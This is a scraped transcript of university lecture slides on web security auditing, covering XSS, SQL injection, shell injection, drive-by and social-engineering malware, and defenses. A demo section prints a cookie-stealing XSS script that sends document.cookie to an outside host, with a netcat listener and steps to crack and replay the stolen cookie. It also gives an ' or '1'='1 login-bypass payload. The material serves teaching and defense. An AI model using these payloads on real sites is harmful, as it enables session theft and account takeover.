Earth system models of intermediate complexity: Examining the past to understand the future
Auditing Web Security. Objectives Understand the complexity of Web infrastructure and current trends...
-
Upload
allison-paul -
Category
Documents
-
view
217 -
download
2
Transcript of Auditing Web Security. Objectives Understand the complexity of Web infrastructure and current trends...
Auditing Web Auditing Web SecuritySecurity
ObjectivesObjectives
Understand the complexity of Understand the complexity of Web infrastructure and current Web infrastructure and current trends of Web threattrends of Web threat
Understand the mechanisms and Understand the mechanisms and defense of major Web attacks: defense of major Web attacks: XSS, SQL injection and shell XSS, SQL injection and shell attacksattacks
Why Web Security: Why Web Security: a Real Business a Real Business ProblemProblem
> 60% of total attack attempts > 60% of total attack attempts observed on the Net are against observed on the Net are against Web applicationsWeb applications
> 80% of vulnerabilities discovered > 80% of vulnerabilities discovered are in web appsare in web apps
Independent security auditIndependent security audit Regulatory complianceRegulatory compliance
Anatomy of Web Anatomy of Web AttacksAttacks
1.1. Attacker breaks into a legitimate website and posts Attacker breaks into a legitimate website and posts malwaremalware• Malware is no longer exclusive to malicious Web sites.Malware is no longer exclusive to malicious Web sites.
2.2. Attacking end-user machines.Attacking end-user machines.• Malware on a Web site makes its way down on to a Malware on a Web site makes its way down on to a
user’s machine when that user visits the host Web site. user’s machine when that user visits the host Web site. • ““Drive-by-download” – happens automatically with no Drive-by-download” – happens automatically with no
user interaction required user interaction required • Additional techniques which do require some input from Additional techniques which do require some input from
the user, but in practice are equally, if not more so, the user, but in practice are equally, if not more so, effective.effective.
3.3. Leveraging end user machines for malicious activity. Leveraging end user machines for malicious activity.
Anatomy of Web Anatomy of Web AttacksAttacks
Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009
Big trend: software as a (Web-based) Big trend: software as a (Web-based) serviceservice– Online banking, shopping, government, etc.Online banking, shopping, government, etc.– Cloud computingCloud computing
Applications hosted on Web serversApplications hosted on Web servers– Written in a mixture of PHP, Java, Perl, Python, Written in a mixture of PHP, Java, Perl, Python,
C, ASPC, ASP Security is rarely the main concernSecurity is rarely the main concern
– Poorly written scripts with inadequate input Poorly written scripts with inadequate input validationvalidation
– Sensitive data stored in world-readable filesSensitive data stored in world-readable files
Web ApplicationsWeb Applications
Runs on a Web server or application serverRuns on a Web server or application server Takes input from Web users (via Web server)Takes input from Web users (via Web server) Interacts with back-end databases and third Interacts with back-end databases and third
partiesparties Prepares and outputs results for users (via Web Prepares and outputs results for users (via Web
server)server)– Dynamically generated HTML pagesDynamically generated HTML pages– Contain content from many different sources, often Contain content from many different sources, often
including regular usersincluding regular users Blogs, social networks, photo-sharing websites…Blogs, social networks, photo-sharing websites… Web advertisements, usually third partyWeb advertisements, usually third party
– A webpage can have content coming from 10-20 A webpage can have content coming from 10-20 different domainsdifferent domains
Typical Web Application Typical Web Application DesignDesign
Two Sides of Web Two Sides of Web SecuritySecurity
Web browser (front end)Web browser (front end)– Can be attacked by any website it visitsCan be attacked by any website it visits– Attacks lead to malware installation (keyloggers, Attacks lead to malware installation (keyloggers,
botnets), document theft, loss of private databotnets), document theft, loss of private data Web application (back end)Web application (back end)
– Runs at websiteRuns at website Banks, online merchants, blogs, Google Apps, etc.Banks, online merchants, blogs, Google Apps, etc.
– Written in Javascript, PHP, ASP, JSP, Ruby, …Written in Javascript, PHP, ASP, JSP, Ruby, …– Many potential bugs: XSS, SQL injection, XSRFMany potential bugs: XSS, SQL injection, XSRF– Attacks lead to stolen credit cards, defaced sites, Attacks lead to stolen credit cards, defaced sites,
etc.etc.
Chicago Tribune Home PageChicago Tribune Home Page
How Are Legitimate Web How Are Legitimate Web Sites Compromised?Sites Compromised?
1.1. SQL Injection AttacksSQL Injection Attacks2.2. Malicious AdvertisementsMalicious Advertisements
– Many Web sites today display advertisements Many Web sites today display advertisements hosted by third-party advertising siteshosted by third-party advertising sites
– Volume of ads published automatically makes Volume of ads published automatically makes detection difficultdetection difficult
– Random appearances further compounds the Random appearances further compounds the detectiondetection
3.3. Search Engine Result RedirectionSearch Engine Result Redirection4.4. Attacks on the backend virtual hosting Attacks on the backend virtual hosting
companiescompanies5.5. Cross-site scripting (XSS) attacksCross-site scripting (XSS) attacks6.6. Vulnerabilities in the Web server or forum Vulnerabilities in the Web server or forum
hosting software (e.g., shell attacks)hosting software (e.g., shell attacks)
slide slide 1212
JavaScriptJavaScript Language executed by browserLanguage executed by browser
– Scripts are embedded in Web pagesScripts are embedded in Web pages– Can run before HTML is loaded, before page is Can run before HTML is loaded, before page is
viewed, while it is being viewed or when leaving viewed, while it is being viewed or when leaving the pagethe page
Used to implement “active” web pagesUsed to implement “active” web pages– AJAX, huge number of Web-based applicationsAJAX, huge number of Web-based applications
Many security and correctness issuesMany security and correctness issues– Attacker gets to execute some code on user’s Attacker gets to execute some code on user’s
machinemachine– Often used to exploit other vulnerabilitiesOften used to exploit other vulnerabilities
Cross Site ScriptingCross Site Scripting
Attacker goal: their code into Attacker goal: their code into browserbrowser
XSS forces a website visitor to XSS forces a website visitor to execute malicious code in his/her execute malicious code in his/her browserbrowser
Count for roughly 80% of all Count for roughly 80% of all documented security documented security vulnerabilitiesvulnerabilities
XSS RisksXSS Risks
XSS abuses render engines or XSS abuses render engines or plug-insplug-ins
Steal browser cookiesSteal browser cookies Steal session info for replay Steal session info for replay
attackattack Malware or bot installationMalware or bot installation Redirect or phishing attemptRedirect or phishing attempt
XSS Example 1XSS Example 1 Trudy posts the following JavaScript on a Trudy posts the following JavaScript on a
message board:message board: <script language="javascript"> <script language="javascript">
var url = var url = "http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie); cookie=“+ encodeURI(document.cookie); </script> </script>
Then run a TCP server listening on port Then run a TCP server listening on port 5000 with e.g., nc –l 50005000 with e.g., nc –l 5000
When Bob views the posted message, his When Bob views the posted message, his browser executes the malicious script, and browser executes the malicious script, and his session cookie is sent to Trudyhis session cookie is sent to Trudy
XSS Demo InstructionsXSS Demo Instructions Set port forward to bypass the firewallSet port forward to bypass the firewall
ssh -L 8000:netsec-demos:2000 ssh -L 8000:netsec-demos:2000 [email protected] [email protected]
Note: 8000 is the local port, it's forwarded to Note: 8000 is the local port, it's forwarded to netsec-demos port 2000 through netsec-1netsec-demos port 2000 through netsec-1
Use http://localhost:8000 to access Use http://localhost:8000 to access http://netsec-http://netsec-demos.cs.northwestern.edu:2000 demos.cs.northwestern.edu:2000
XSS Demo Instructions XSS Demo Instructions (II)(II)
Login as ychen and post the script with a Login as ychen and post the script with a sexy title (e.g., hot game!)sexy title (e.g., hot game!)
<script language="javascript"><script language="javascript">
var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";
url = url + encodeURI(document.cookie);url = url + encodeURI(document.cookie);
new Image().src=url;new Image().src=url;
</script></script>
Hi Everyone! Thanks for your cookies!Hi Everyone! Thanks for your cookies!
Ssh to that machine (e.g., Ssh to that machine (e.g., cal.cs.northwestern.edu) and runcal.cs.northwestern.edu) and run
nc –l 5000 nc –l 5000
Simple XSS CodeSimple XSS Codevar url = var url =
"http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie);cookie=“+ encodeURI(document.cookie);
document.cookie is the browser's entire document.cookie is the browser's entire cookie for the current website cookie for the current website
encodeURI() is a javascript function to encodeURI() is a javascript function to hex-encode certain characters to be hex-encode certain characters to be included as part of a URLincluded as part of a URL– E.g., changing the space character to %20E.g., changing the space character to %20– Make the URL less suspiciousMake the URL less suspicious
What can Attacker Do What can Attacker Do with the Cookie?with the Cookie?
Another user test458 login as and when Another user test458 login as and when clicking the post, cookie is sent to the attackerclicking the post, cookie is sent to the attacker
Crack Bob’s password (MD5 hash in the cookie) Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password with John the Ripper, Hydra, or any password crackercracker
For more info, For more info, http://netsec.cs.northwestern.edu/resources/password-http://netsec.cs.northwestern.edu/resources/password-cracking/cracking/
Use a Firefox plugin like Tamperdata to reset Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bobyour cookies to impersonate Bob
XSS DetectionXSS Detection A client usually is not supposed to send A client usually is not supposed to send
scripts to serversscripts to servers If the server receives <SCRIPT>… or the If the server receives <SCRIPT>… or the
hex equivalent in an incoming packet and hex equivalent in an incoming packet and that same script is sent unsanitized in an that same script is sent unsanitized in an outgoing packet, then an attack has outgoing packet, then an attack has occurredoccurred– A sanitized script could look like &ls;SCRIPT>A sanitized script could look like &ls;SCRIPT>
…… Any user input Any user input mustmust be preprocessed be preprocessed
before it is used inside HTMLbefore it is used inside HTML
SQL InjectionSQL Injection
Malicious SQL statements run on a Malicious SQL statements run on a database and thus attack the serverdatabase and thus attack the server
– XSS can only target other usersXSS can only target other users
SQL Injection ExampleSQL Injection Example Trudy accesses Bob’s website; in which he does not Trudy accesses Bob’s website; in which he does not
validate input on his sign in formvalidate input on his sign in form– Runs a SQL statement like the following:Runs a SQL statement like the following:– select username, user_password from select username, user_password from
minibbtable_users where user_password = minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; md5('johnspassword') and username='johndoe’;
Set username to ' or '1'='1 Set username to ' or '1'='1 select username, user_password from select username, user_password from
minibbtable_users where user_password = minibbtable_users where user_password = md5('anyrandompassword') and username='' or md5('anyrandompassword') and username='' or '1'='1’; '1'='1’;
Effect: picks any row where the username is blank Effect: picks any row where the username is blank and the password matches or any row where true.and the password matches or any row where true.
Add “limit 1” to pick the first rowAdd “limit 1” to pick the first row
SQL Injection SQL Injection DetectionDetection
Input validation on any outgoing SQL Input validation on any outgoing SQL statements from the web server to the statements from the web server to the database serverdatabase server– FilterFilter
Apostrophes, semicolons, percent symbols, hyphens, Apostrophes, semicolons, percent symbols, hyphens, underscores, …underscores, …
Any character that has special meanings must be Any character that has special meanings must be escaped, .e.g., convert ’ into \’escaped, .e.g., convert ’ into \’
– Only works for string inputsOnly works for string inputs– Different databases have different rules for escapingDifferent databases have different rules for escaping
– Check the data type (e.g., make sure it’s an Check the data type (e.g., make sure it’s an integer)integer)
Shell AttacksShell Attacks
Control an actual machine like Control an actual machine like a web servera web server
Shell AttacksShell Attacks
Inject commands into scripts that Inject commands into scripts that use Linux utilitiesuse Linux utilities– E.g., with “;” as command separator in E.g., with “;” as command separator in
UNIX/LINUXUNIX/LINUX CGI programs like perl can use CGI programs like perl can use
command-line programs (e.g. grep, command-line programs (e.g. grep, ls)ls)
Unsanitized input as arguments Unsanitized input as arguments can lead to command execution.can lead to command execution.
Defense ApproachesDefense Approaches
Web firewall/IDSWeb firewall/IDS– ModSecurity for ApacheModSecurity for Apache– Commercial: SecureSphere from ImpervaCommercial: SecureSphere from Imperva
Static code analysisStatic code analysis– Open source: NiktoOpen source: Nikto– Commercial: Commercial:
Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner N-stalkerN-stalker
Education on good codingEducation on good coding– HTML encoding on input (server-side)HTML encoding on input (server-side)– Input validation/filteringInput validation/filtering
GETTING ONTO A USER’S COMPUTER GETTING ONTO A USER’S COMPUTER
Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009
Automatic Attack Automatic Attack ExposureExposure
Techniques used to deliver Techniques used to deliver malware from Websites to a users malware from Websites to a users computer.computer.
ExposureExposure– Browsing a websiteBrowsing a website– No user interaction is requiredNo user interaction is required– Executable content is automatically Executable content is automatically
downloadeddownloaded
Social EngineeringSocial Engineering
Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009
• People are tricked into performing actions they would not otherwise want to perform
Types of Social Types of Social Engineering AttacksEngineering Attacks Fake CodecFake Codec Malicious Peer-to-Peer (P2P) FilesMalicious Peer-to-Peer (P2P) Files Malicious AdvertisementsMalicious Advertisements Fake Scanner Web PageFake Scanner Web Page Blog SpamBlog Spam Other Attack VectorsOther Attack Vectors
Fake CodecFake Codec
User is prompted to install a missing User is prompted to install a missing codeccodec
Codec is actually malware codeCodec is actually malware code– Usually a trojan horseUsually a trojan horse
Malicious Peer-to-Peer Malicious Peer-to-Peer (P2P) Files(P2P) Files Malware authors bind content into popular Malware authors bind content into popular
applicationsapplications– Files named after celebrities, popular Files named after celebrities, popular
bandsbands– Uploaded to popular P2P sites where they Uploaded to popular P2P sites where they
are downloaded by unsuspecting usersare downloaded by unsuspecting users Openly available how-to materials on the Openly available how-to materials on the
internetinternet– Details how to build and distribute Details how to build and distribute
malwaremalware– Pay-Per-Install malwarePay-Per-Install malware
Fake Scanner Web Fake Scanner Web PagePage
Create a web site or product Create a web site or product that misrepresents the truththat misrepresents the truth– JavaScript pop-ups notifying of JavaScript pop-ups notifying of
false need to install operating false need to install operating system updatessystem updates
Source: Web Based Attacks, Symantec 2009
–Tools that claim to scan for and remove adult images, etc.
Blog SpamBlog Spam
Alluring links posted on blogs Alluring links posted on blogs – Links embedded in blog commentsLinks embedded in blog comments– Direct users to sites that leverage Direct users to sites that leverage
social engineering tricks or browser social engineering tricks or browser exploits to spread malwareexploits to spread malware
Other Attack VectorsOther Attack Vectors
SpamSpam– Emails contain links directing people Emails contain links directing people
to drive by download, fake to drive by download, fake scanner/codec, and malware sitesscanner/codec, and malware sites
Pirated software sitesPirated software sites– Pirated versions of software are Pirated versions of software are
bundled with or comprised solely of bundled with or comprised solely of trojan horsestrojan horses
Other Attack VectorsOther Attack Vectors
What is buffer overflow?What is buffer overflow? Hackers typically break into a remote system by Hackers typically break into a remote system by
exploiting some exploiting some vulnerabilityvulnerability of its software --- a of its software --- a programming or configuration bug that makes it programming or configuration bug that makes it possible to subvert the software and have it execute possible to subvert the software and have it execute unplanned instructions.unplanned instructions.
buffer overflow occurs anytime the program writes buffer overflow occurs anytime the program writes more information into the buffer than the space it has more information into the buffer than the space it has allocated in the memory. This allows an attacker to allocated in the memory. This allows an attacker to overwrite data that controls the program execution overwrite data that controls the program execution path and hijack the control of the program to execute path and hijack the control of the program to execute the attacker’s code instead the process code.the attacker’s code instead the process code.
How to Protect How to Protect YourselfYourself
Update and Patch SoftwareUpdate and Patch Software– Get latest OS, Browser, Application patchesGet latest OS, Browser, Application patches– Browswer Plug-in updates often forgottenBrowswer Plug-in updates often forgotten
Endpoint Protection SoftwareEndpoint Protection Software– Anti-virus software for signature based detection Anti-virus software for signature based detection
and behavioral monitoringand behavioral monitoring– Update Protection Software SubscriptionUpdate Protection Software Subscription
Could miss 70,000 new unique virus variants for one weekCould miss 70,000 new unique virus variants for one week Be SuspiciousBe Suspicious
– Avoid things that seem too good to be trueAvoid things that seem too good to be true– Use safe search functionality in browsersUse safe search functionality in browsers
Adopt Strong Password PolicyAdopt Strong Password Policy